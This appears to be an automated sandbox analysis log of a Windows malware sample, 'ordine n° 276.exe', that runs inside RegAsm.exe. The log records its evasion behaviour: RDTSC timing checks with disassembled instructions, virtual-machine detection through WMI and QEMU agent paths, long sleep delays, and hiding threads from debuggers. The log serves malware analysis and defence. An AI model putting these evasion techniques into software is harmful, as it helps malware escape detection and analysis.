Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

RDTSC instruction interceptor: First address: 0000000002B923B7 second address: 0000000002B923B7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FADB0D044E8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dh, ch 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 test ecx, 93E93443h 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FADB0D044C6h 0x0000002e test cx, 1904h 0x00000033 push ecx 0x00000034 call 00007FADB0D04502h 0x00000039 call 00007FADB0D044F8h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Function Chain: memAlloc,memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed,threadDelayed,keyOpened,keyEnumerated,keyEnumerated

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ordine n#U00b0 276.exe, 00000000.00000002.776473131.0000000002BA0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1726371428.0000000001110000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: ordine n#U00b0 276.exe, 00000000.00000002.776473131.0000000002BA0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: RegAsm.exe, 00000008.00000002.1726371428.0000000001110000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	RDTSC instruction interceptor: First address: 0000000002B923B7 second address: 0000000002B923B7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FADB0D044E8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dh, ch 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 test ecx, 93E93443h 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FADB0D044C6h 0x0000002e test cx, 1904h 0x00000033 push ecx 0x00000034 call 00007FADB0D04502h 0x00000039 call 00007FADB0D044F8h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	RDTSC instruction interceptor: First address: 0000000002B92528 second address: 0000000002B92528 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FADB08004F0h 0x0000001d popad 0x0000001e call 00007FADB07FE2EAh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FB2528 second address: 0000000000FB2528 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FADB0D06700h 0x0000001d popad 0x0000001e call 00007FADB0D044FAh 0x00000023 lfence 0x00000026 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Window / User API: threadDelayed 2874

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -86220000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -39718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -40406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -39594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -59562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -39468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -59468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3484	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: RegAsm.exe, 00000008.00000002.1733290037.0000000020310000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000008.00000002.1726912916.00000000013E1000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000008.00000002.1733290037.0000000020310000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe, 00000008.00000002.1726912916.00000000013E1000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW,
Source: ordine n#U00b0 276.exe, 00000000.00000002.776473131.0000000002BA0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1726371428.0000000001110000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000008.00000002.1733290037.0000000020310000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000008.00000002.1726371428.0000000001110000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32USERPROFILE=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: ordine n#U00b0 276.exe, 00000000.00000002.776473131.0000000002BA0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
Source: RegAsm.exe, 00000008.00000002.1733290037.0000000020310000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 8_2_01602888 LdrInitializeThunk,

8_2_01602888

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040377D mov ebx, dword ptr fs:[00000030h]	0_2_0040377D
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004038C1 mov ebx, dword ptr fs:[00000030h]	0_2_004038C1
